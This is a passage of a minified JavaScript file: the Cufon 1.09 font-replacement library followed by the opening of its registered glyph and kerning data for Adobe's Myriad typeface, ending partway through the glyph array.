/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.09
 */
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());

/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Copyright © 2000 Adobe Systems Incorporated. All Rights Reserved. U.S. Patent
 * Des. pending.
 * 
 * Trademark:
 * Myriad is a registered trademark of Adobe Systems Incorporated.
 * 
 * Designer:
 * Robert Slimbach and Carol Twombly
 * 
 * Vendor URL:
 * http://www.adobe.com/type
 * 
 * License information:
 * http://www.adobe.com/type/legal.html
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"81,-247r0,287r-70,0r0,-25r38,0r0,-236r-38,0r0,-26r70,0","w":108},{"d":"147,-72v0,-38,-38,-40,-78,-39r0,79v39,3,77,-1,78,-40xm140,-178v1,-35,-38,-37,-71,-32r0,67v37,2,70,-3,71,-35xm193,-70v0,77,-91,77,-167,69r0,-238v62,-9,160,-14,159,56v0,27,-21,43,-41,53v28,7,49,26,49,60","w":207,"k":{"T":5,"V":2,"W":2,"Y":9,",":5,".":5,"c":-2,"d":-2,"e":-2,"o":-2,"q":-2,"\u00ad":-3}},{"d":"186,-126v0,-65,-50,-95,-116,-81r0,174v72,8,116,-24,116,-93xm233,-127v0,112,-97,142,-207,126r0,-238v103,-17,207,3,207,112","w":245,"k":{"T":10,"Y":12,",":13,".":13,"A":5,"f":-5,"g":-2,"t":-5,"v":-4,"w":-4,"y":-4,"X":11,")":5,"]":5,"}":5,"\u00ad":-5,"u":-1,"x":3}},{"d":"153,-89v0,-61,-79,-75,-85,-18v-4,41,3,76,40,76v31,0,45,-25,45,-58xm118,4v-27,1,-44,-13,-56,-30r-2,26r-38,0r2,-256r44,0r1,105v11,-16,28,-29,56,-28v50,2,73,38,73,89v0,55,-28,92,-80,94","w":210,"k":{"T":16,",":11,".":11,"v":3,"w":3,"y":3,"'":6,"\"":6,")":2,"]":2,"}":2,"\u00ad":-5,"z":3,"x":7}},{"d":"96,-30v34,-3,41,-43,40,-88v0,-44,-5,-82,-39,-86v-32,4,-40,43,-40,86v0,45,6,84,39,88xm95,4v-62,0,-83,-56,-83,-120v0,-66,22,-122,86,-122v63,0,83,55,83,119v0,67,-20,123,-86,123"},{"d":"62,-149v16,-37,91,-40,105,2v13,-18,27,-32,57,-32v76,1,55,104,58,179r-43,0v-6,-51,20,-143,-31,-143v-54,0,-26,91,-33,143r-44,0r0,-102v0,-22,-8,-42,-30,-41v-54,5,-28,90,-34,143r-43,0r-2,-175r38,0","w":305,"k":{"T":19,"t":2,"v":6,"w":6,"y":6,"'":4,"\"":4}},{"d":"72,-206r-69,0r0,-37r183,0r0,37r-70,0r0,206r-44,0r0,-206","w":189,"k":{"i":18,"T":-10,"V":-12,"W":-12,"Y":-6,",":26,".":26,"A":26,"C":10,"G":10,"O":10,"Q":10,"J":18,"c":28,"d":28,"e":28,"o":28,"q":28,"g":22,"v":17,"w":17,"y":17,"S":3,"a":23,"b":4,"h":4,"k":4,"l":4,"m":18,"n":18,"p":18,"r":18,"s":23,"X":-7,"'":-5,"\"":-5,")":-16,"]":-16,"}":-16,"\u00ad":20,"u":18,"z":19,"x":8,":":11,";":11}},{"d":"6,-37v38,13,68,-4,68,-50r0,-156r44,0v-2,115,30,285,-118,241","w":141,"k":{",":3,".":3,"v":-2,"w":-2,"y":-2,")":-9,"]":-9,"}":-9}},{"d":"55,-53v-2,38,57,26,61,1v1,-10,1,-22,1,-34v-30,1,-61,4,-62,33xm116,-114v4,-44,-59,-38,-83,-21r-9,-29v14,-9,38,-15,63,-15v93,0,67,98,76,179r-40,0v-2,-6,0,-16,-5,-19v-25,36,-109,29,-106,-29v3,-51,47,-66,104,-66","w":182,"k":{"T":20,"t":2,"v":4,"w":4,"y":4,"'":4,"\"":4}},{"d":"164,-66r-57,-133r-56,133r-33,0r75,-168r29,0r75,168r-33,0","w":214},{"d":"132,-106v7,-49,-62,-56,-74,-15v-2,5,-3,10,-3,15r77,0xm98,-179v57,-1,83,47,74,104r-117,0v-1,49,65,52,103,37r6,30v-63,29,-156,5,-151,-77v4,-56,30,-93,85,-94","w":185,"k":{"T":13,",":5,".":5,"\u00ad":-10,"x":3}},{"d":"70,-243r0,98r102,0r0,-98r45,0r0,243r-45,0r0,-107r-102,0r0,107r-44,0r0,-243r44,0","w":241,"k":{"Y":5,"f":-3,"t":-4,"v":-1,"w":-1,"y":-1,"b":-2,"h":-2,"k":-2,"l":-2,"i":-2,"m":-2,"n":-2,"p":-2,"r":-2,"z":-3}},{"d":"34,-9v1,-36,19,-84,-24,-83r0,-23v42,1,25,-48,24,-84v-1,-38,25,-51,64,-48r0,26v-68,-8,6,108,-56,118v37,4,24,53,24,89v0,20,10,31,32,29r0,25v-40,3,-64,-11,-64,-49","w":108,"k":{"T":-12,"V":-13,"W":-13,"Y":-13,"A":6,"C":6,"G":6,"O":6,"Q":6,"J":-5,"X":-3,"j":-19}},{"d":"144,-169v0,-37,-38,-47,-75,-39r0,81v37,8,75,-5,75,-42xm188,-171v0,63,-55,88,-119,79r0,92r-43,0r0,-239v68,-11,162,-11,162,68","w":201,"k":{"Y":5,",":51,".":51,"A":26,"J":27,"c":9,"d":9,"e":9,"o":9,"q":9,"g":9,"t":-3,"v":-2,"w":-2,"y":-2,"M":5,"a":8,"i":4,"m":4,"n":4,"p":4,"r":4,"s":8,"X":8,"\u00ad":5,"Z":7,"u":4,":":4,";":4}},{"d":"64,-102v-16,0,-18,12,-19,30r-28,0v-8,-63,55,-75,97,-45v19,13,60,28,56,-15r28,0v2,38,-11,61,-45,62v-36,1,-56,-32,-89,-32","w":214},{"d":"81,0r0,-101r-77,-142r51,0r50,111r51,-111r50,0r-81,141r0,102r-44,0","w":207,"k":{"T":-6,"V":-8,"W":-8,"Y":5,",":39,".":39,"A":31,"C":15,"G":15,"O":15,"Q":15,"J":22,"c":34,"d":34,"e":34,"o":34,"q":34,"g":23,"t":12,"v":15,"w":15,"y":15,"M":6,"S":8,"a":30,"b":5,"h":5,"k":5,"l":5,"i":6,"m":6,"n":6,"p":6,"r":6,"s":21,"X":5,"'":-3,"\"":-3,")":-15,"]":-15,"}":-15,"\u00ad":21,"u":23,"z":14,"x":15,":":15,";":15,"B":5,"D":5,"E":5,"F":5,"H":5,"I":5,"K":5,"L":5,"N":5,"P":5,"R":5}},{"d":"100,-32v57,0,30,-89,36,-143r45,0r1,175r-38,0v-2,-8,0,-20,-4,-26v-10,17,-28,29,-56,30v-79,1,-59,-102,-61,-179r44,0v6,52,-20,143,33,143","w":204,"k":{"T":13,",":3,".":3}},{"d":"102,-28v57,-1,58,-119,0,-119v-60,0,-58,119,0,119xm190,-89v0,59,-35,93,-90,93v-54,0,-87,-33,-87,-90v1,-58,33,-93,90,-93v56,0,87,35,87,90","w":203,"k":{"T":16,",":11,".":11,"v":3,"w":3,"y":3,"'":6,"\"":6,")":2,"]":2,"}":2,"\u00ad":-5,"z":3,"x":7}},{"d":"118,4v-117,0,-90,-137,-93,-247r44,0v7,78,-28,211,50,211v81,0,42,-134,51,-211r45,0v-2,113,23,247,-97,247","w":239,"k":{",":9,".":9,"A":12,"f":-2,"v":1,"w":1,"y":1,"a":2,"s":4,"z":3,"x":4}},{"d":"235,0r-7,-201r-2,0r-28,93r-36,105r-34,0r-46,-151v-4,-16,-8,-32,-11,-47r-10,201r-42,0r17,-243r58,0r44,141v5,13,5,29,11,41r24,-84r34,-98r57,0r14,243r-43,0","w":297,"k":{"T":4,"A":2,"c":-2,"d":-2,"e":-2,"o":-2,"q":-2,"a":-1,"i":-3,"m":-3,"n":-3,"p":-3,"r":-3,"j":-2,"\u00ad":-1}},{"d":"171,-67v2,73,-102,86,-157,55r10,-34v27,20,102,25,101,-23v-1,-35,-34,-41,-73,-39r0,-33v33,1,65,-3,66,-32v2,-41,-65,-32,-86,-15r-10,-32v41,-27,143,-28,141,39v0,29,-20,46,-43,56v29,6,50,24,51,58"},{"d":"26,-243r43,0v2,36,-4,80,2,112v24,-40,54,-74,81,-112r54,0r-83,104r89,139r-52,0r-69,-111r-22,26r0,85r-43,0r0,-243","w":209,"k":{"T":-5,"V":-3,"W":-3,"Y":4,",":-5,".":-5,"A":-4,"C":9,"G":9,"O":9,"Q":9,"J":-12,"c":3,"d":3,"e":3,"o":3,"q":3,"g":3,"v":10,"w":10,"y":10,"a":-3,"b":-1,"h":-1,"k":-1,"l":-1,"i":-2,"m":-2,"n":-2,"p":-2,"r":-2,")":-5,"]":-5,"}":-5,"\u00ad":8,"Z":-6,"u":5,":":-5,";":-5}},{"d":"59,-121v0,74,68,104,133,79r7,35v-88,32,-186,-10,-186,-111v0,-102,93,-149,188,-118r-9,35v-64,-25,-133,6,-133,80","w":211,"k":{"T":-7,"V":-4,"W":-4,"Y":-2,"A":-3,"C":9,"G":9,"O":9,"Q":9,"J":-3,"c":6,"d":6,"e":6,"o":6,"q":6,"v":10,"w":10,"y":10,"a":3,"'":-1,"\"":-1,")":-5,"]":-5,"}":-5,"u":6,"z":-2}},{"d":"122,-137v-70,-14,-52,74,-54,137r-44,0r-2,-175r38,0v2,10,0,24,3,33v8,-23,29,-41,59,-36r0,41","w":128,"k":{"T":6,",":21,".":21,"c":3,"d":3,"e":3,"o":3,"q":3,"f":-10,"g":3,"t":-8,"v":-8,"w":-8,"y":-8,"a":3,"z":-3,"x":-5}},{"d":"17,42v24,-8,61,-28,50,-56r-64,-161r49,0r42,127r37,-127r47,0r-60,162v-19,44,-41,83,-91,92","w":180,"k":{"T":12,",":16,".":16,"c":5,"d":5,"e":5,"o":5,"q":5,"g":4,"v":-6,"w":-6,"y":-6,"a":2,"s":4,"\u00ad":2,":":-5,";":-5}},{"d":"70,-243r0,243r-44,0r0,-243r44,0","w":95,"k":{"Y":5,"f":-3,"t":-4,"v":-1,"w":-1,"y":-1,"b":-2,"h":-2,"k":-2,"l":-2,"i":-2,"m":-2,"n":-2,"p":-2,"r":-2,"z":-3}},{"d":"46,-201v-14,0,-25,-11,-25,-23v-1,-13,11,-24,25,-24v16,0,25,10,25,24v0,12,-10,23,-25,23xm24,0r0,-175r44,0r0,175r-44,0","w":92},{"d":